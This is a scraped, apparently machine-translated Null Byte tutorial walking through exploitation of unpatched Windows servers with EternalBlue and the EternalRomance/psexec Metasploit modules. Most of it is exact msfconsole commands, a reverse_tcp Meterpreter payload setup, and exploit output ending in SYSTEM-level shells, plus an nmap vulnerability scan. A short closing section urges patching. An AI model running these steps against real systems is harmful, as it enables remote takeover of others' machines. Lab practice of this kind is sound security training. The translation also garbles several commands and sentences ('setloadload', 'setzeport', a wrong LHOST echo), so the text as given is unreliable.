قالب وردپرس درنا توس
Home / Tips and Tricks / Using EternalBlue on Windows Server with Metasploit «null byte :: WonderHowTo

Using EternalBlue on Windows Server with Metasploit «null byte :: WonderHowTo



Certain vulnerabilities and exploits make headlines with their catchy names and impressive damage potential. EternalBlue is one of those exploits. Originally bound to the NSA, this zero-day exploded an error in the SMB protocol that affected many Windows computers and caused devastation everywhere. Here we will use EternalBlue to exploit SMB via Metasploit.

What is EternalBlue?

EternalBlue is an exploit most likely developed by the NSA as a previous zero-day. It was released in 2017 by Shadow Brokers, a hacker group known for the leak of tools and exploits used by the Equation Group, which may have links to the NSA's Tailored Access Operations unit.

EternalBlue, also known as MS1

7-010, is a vulnerability in the Microsoft Server Message Block (SMB) protocol. SMB enables systems to share files, printers, and other resources on the network. The vulnerability could occur because earlier versions of SMB contain an error that could allow an attacker to establish a null-session connection through anonymous logons. An attacker could then send malformed packets and eventually execute arbitrary commands on the target.

EternalBlue was mainly responsible for the outbreaks WannaCry, NotPetya and BadRabbit as well as the EternalRocks worm. Option 1: Exploit EternalBlue Metasploit

We are using an unpatched copy of Windows Server 2008 R2 as the target for the first section of this tutorial. An evaluation version can be downloaded from from Microsoft so that you can better understand it.

Step 1: Find a module to use

The first thing we need to do is open the terminal and start Metasploit. Enter service postgresql start to initialize the PostgreSQL database if it is not already running, followed by msfconsole .

  service postgresql start
msfconsole 

Then use the search command in Metasploit to find a suitable module.

  search eternalblue 
  Matching Modules
==================

Date of disclosure of the name Rank Check the description
---- --------------- ---- ----- -----------
Auxiliary / admin / smb / ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Command Execution
Auxiliary device / scanner / smb / smb_ms17_010 normal Yes MS17-010 SMB-RCE detection
Exploit / windows / smb / ms17_010_eternalblue 2017-03-14 Average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool corruption
Exploit / windows / smb / ms17_010_eternalblue_win8 2017-03-14 Average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8 +
Exploit / windows / smb / ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Code Execution 

There is an additional scanner that can be used to determine if a target is vulnerable for MS17-010 is. It is always a good idea to do the necessary reconstruction like this. Otherwise, you could waste a lot of time if the target is not even vulnerable.

If we have determined that our target is actually vulnerable to EternalBlue, we can use the following exploit module to do the search we just performed.

  use Exploit / windows / smb / ms17_010_eternalblue 

You know that you're good when you see the prompt "Exploit (windows / smb / ms17_010_eternalblue)".

Step 2: Run the module

You can view the current settings with the command .

  Options 
  Module Options (Exploit / windows / smb / ms17_010_eternalblue):

Name Current setting Required description
---- --------------- -------- -----------
RHOSTS yes The destination address range or CIDR identifier
RPORT 445 Yes The destination port (TCP)
SMB domain. no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified user name
SMBUser no (Optional) The user name under which to authenticate
VERIFY_ARCH true yes Verify that the remote architecture matches the exploit destination.
VERIFY_TARGET true yes Verifies that the remote operating system matches the exploit destination.

Exploit target:

ID name
- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs 

First, you must specify the IP address of the destination.

  Rhosts set 10.10.0.101 
  Rhosts => 10.10.0.101 

Next we can load the trusty reverse_tcp shell as a payload.

  setloadload windows / x64 / meterpreter / reverse_tcp 
  payload => windows / x64 / meterpreter / reverse_tcp 

Lastly, set the Listening Host setting to the IP address of our local computer.

  Set lhost 10.10.0.1 
  lhost => 10.10.0.1 

And the listening port is set to an appropriate number.

  Lport 4321 
  lport => 4321 

That should be all, so all you have to do is start the exploit. Use the command run to fire it.

  run 
  [*] Launched a reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.101:445 - Connection with target for exploitation.
[+] 10.10.0.101:445 - Connection made for exploitation.
[+] 10.10.0.101:445 - The selected target operating system is valid for the operating system specified by the SMB response
[*] 10.10.0.101:445 - CORE buffer for raw buffer (51 bytes)
[*] 10.10.0.101:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.10.0.101:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 10.10.0.101:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 10.10.0.101:445 - 0x00000030 6b 20 31 k 1
[+] 10.10.0.101:445 - Target arc selected, valid for arcs, indicated by DCE / RPC response
[*] 10.10.0.101:445 - Try out Exploit with 12 Groom Allocations.
[*] 10.10.0.101:445 - Send the exploit package except for the last fragment
[*] 10.10.0.101:445 - Starting a non-paged pool maintenance
[+] 10.10.0.101:445 - Sending SMBv2 buffers
[+] 10.10.0.101:445 - Closing the SMBv1 connection creates a free hole next to the SMBv2 buffer.
[*] 10.10.0.101:445 - Sending the last SMBv2 buffer.
[*] 10.10.0.101:445 - Last fragment of the exploit package is sent!
[*] 10.10.0.101:445 - Received response from the exploit package
[+] 10.10.0.101:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.101:445 - Send egg to damaged connection.
[*] 10.10.0.101:445 - Triggering a damaged buffer.
[*] Transmission level (206403 bytes) to 10.10.0.101
[*] Meterpreter Session 1 has been opened at 2019-03-26 11:01:46 -0500 (10.10.0.1:4321 → 10.10.0.101:49207)
[+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
[+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - WIN - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
[+] 10.10.0.101:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

meterpreter> 

We can see a few things here, like making the SMB connection and sending the exploit package. Finally we see a "WIN" and a meterpreter session is opened. Sometimes this exploit does not finish successfully the first time, so it should not be tried and run through again.

Step 3: Verify that the target is compromised

We can verify that we have compromised the goal by executing commands such as sysinfo to obtain operating system information.

  sysinfo 
  Computer: S02
Operating System: Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture: x64
System language: en_US
Domain: DLAB
Logged in users: 2
Meterpreter: x64 / windows 

and getuid to get the current username.

  getuid 
  Server Username: NT AUTHORITY  SYSTEM 

This exploit is not working very well on newer systems In some cases, the target computer may crash. Next, we will investigate a similar exploit that is a little more reliable, but equally deadly.

Option 2: EternalRomance / EternalSynergy / EternalChampion

As if EternalBlue was not devastating enough, three more similar exploits were developed after that. EternalRomance and EternalSynergy use some kind of confusion (CVE-2017-0143) while EternalChampion and EternalSynergy are using a race condition (CVE-2017-0146).

These were combined in a single Metasploit module that also uses the classic Psexec payload. It is considered more reliable than EternalBlue, it is less likely that the target crashes, and it works with all new, unpatched versions of Windows through Server 2016 and Windows 10.

The only caveat is that this exploit has a Named Pipe required. Named pipes provide a way to perform inter-communication processes, which are usually displayed as a file for other processes to which they can be connected. The Metasploit module automatically checks for named pipes, so it's pretty easy to use as long as there's a named pipe on the target.

Step 1: Find a vulnerable target

We can use Nmap as an alternative to the Metasploit scanner to find out if a target is vulnerable to EternalBlue. The Nmap Scripting Engine is a powerful feature of the core tool that lets you run all sorts of scripts against a target.

Here we use the script smb-vuln-ms17-010 Please check the vulnerability. Our goal is an unpatched copy of Windows Server 2016 Datacenter Edition. Evaluation copies can be downloaded from Microsoft so you can follow them if you want.

We can specify a single script to execute with the option – script together with -v ] flag for verbosity and IP address of our target. First change directories if you are still running metasploit.

  cd
nmap --script smb-vuln-ms17-010 -v 10.10.0.100 

Nmap is running and should not take too long because we're just running a script. At the end of the issue you will find the results.

  Starting Nmap 7.70 (https://nmap.org) at 2019-03-26 11:05 CDT
NSE: 1 scripts were loaded for scanning.
NSE: script precheck.
Initiation of the NSE at 11:05

...

Host script results:
| smb vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution Vulnerability on Microsoft SMBv1 Servers (ms17-010)
| Condition: VULNERABLE
| IDs: CVE: CVE-2017-0143
| Risk Factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| Server (ms17-010).
|
| Release date: 2017-03-14
| references:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/kundenberatung-für-wannacrypt-attacks/
| _ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

NSE: script after scanning.
Initiation of the NSE at 11:05
NSE finished at 11:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap finished: 1 IP address (1 host high) scanned in 2.31 seconds
Sent raw packages: 1181 (51.948KB) | Rcvd: 1001 (40.060KB) 

We can see that the target and other information such as risk factors and links to CVE are considered vulnerable.

Step 2: Find a module to use

Now that we know that the target is vulnerable, we can return to Metasploit and look for a suitable exploit.

  msfconsole
search eternalromance 
  Matching modules
==================

Date of disclosure of the name Rank Check the description
---- --------------- ---- ----- -----------
Auxiliary / admin / smb / ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Command Execution
Exploit / windows / smb / ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance / EternalSynergy / EternalChampion SMB Remote Windows Code Execution 

And use the module in Metasploit with the command . use Exploit / windows / smb / ms17_010_psexec

You will know that you are good when you see the prompt "Exploit (windows / smb / ms17_010_psexec)".

Step 3: Run the module

Let's look at our options:

  Options 
  Module options (exploit / windows / smb / ms17_010_psexec):

Name Current setting Required description
---- --------------- -------- -----------
DBGTRACE false yes View additional information about the debug trace
LEAKATTEMPTS 99 Yes How often do you try to lose the transaction?
NAMEDPIPE no A named pipe to connect to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The destination address range or CIDR identifier
RPORT 445 yes The destination port
SERVICE_DESCRIPTION not a service description to be used for the nice listing
SERVICE_DISPLAY_NAME no The display name of the service
SERVICE_NAME no The service name
SHARE ADMIN $ yes The share to connect to can be an administrator share (ADMIN $, C $, ...) or a normal read / write folder share
SMB domain. no The Windows domain to be used for authentication
SMBPass no The password for the specified user name
SMBUser no The user name under which to authenticate

Exploit target:

ID name
- ----
0 Automatic 

It looks like this exploit uses a list of named pipes to check and connect to a share. We can leave all this for the time being as standard, but we have to stop the remote host.

  Rhodes set 10.10.0.100 
  Rhosts => 10.10.0.100 

And the reverse shell payload.

  Payload set windows / x64 / meterpreter / reverse_tcp 
  payload => windows / x64 / meterpreter / reverse_tcp 

And our local host.

  set lhost 10.10.0.1 
  lhost => 10.10.001 

and local port.

  setzeport 4321 
  lport => 4321 

We should be fine now. Enter run to start the exploit.

  run 
  [*] Launched a reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.100:445 - Target Operating System: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.0.100:445 - A Primitive Write-What-Where ...
[+] 10.10.0.100:445 - Overwrite completed ... SYSTEM session received!
[*] 10.10.0.100:445 - Select the PowerShell destination
[*] 10.10.0.100:445 - Execute the payload ...
[+] 10.10.0.100:445 - Service start has expired, OK, if a command is executed or a non-executable file is executed ...
[*] Send Level (206403 bytes) to 10.10.0.100
[*] Meterpreter Session 2 was opened on 10.09.0.1:4321 -> 10.10.0.100:49965 at 2019-03-26 11:12:30 -0500 

. We can see how the payload runs successfully, and we end up with a meter session.

Step 4: Checking if the target is compromised

Again, we can verify that we have compromised the system with commands such as sysinfo

  sysinfo 
 . Computer: DC01
Operating system: Windows 2016 (Build 14393).
Architecture: x64
System language: en_US
Domain: DLAB
Logged in users: 4
Meterpreter: x64 / windows 

and getuid .

  getuid 
  Server Username: NT AUTHORITY  SYSTEM 

Prevention and Current Status

Despite all the damage that EternalBlue has caused is a reliable way to prevent these types of exploits: patch your systems ! At this point, almost two years after these vulnerabilities became known, there is really no excuse for unpatched operating systems.

EternalBlue is still a problem, and while the consequences are unfortunate, unfortunately, some organizations will still be doing this on unpatched systems. Combined with pirated versions of Windows, EternalBlue remains a major threat today.

Cryptojacking, in which a victim's computer secretly uses the Mine Cryptov is another threat vector that uses EternalBlue to exploit attacks. WannaMine was one of those outbreaks that abducted computers around the world in 2018.

Summary

Today we learned how to use EternalBlue and Metasploit. We also learned that an exploit similar to EB is more reliable and works with more systems. In the next tutorial, we'll dig a little deeper and learn how to use EternalBlue manually, which is much more satisfying in the end.

Cover Picture of Fancycrave / Pexels; Screenshots of drd_ / zero byte

Source link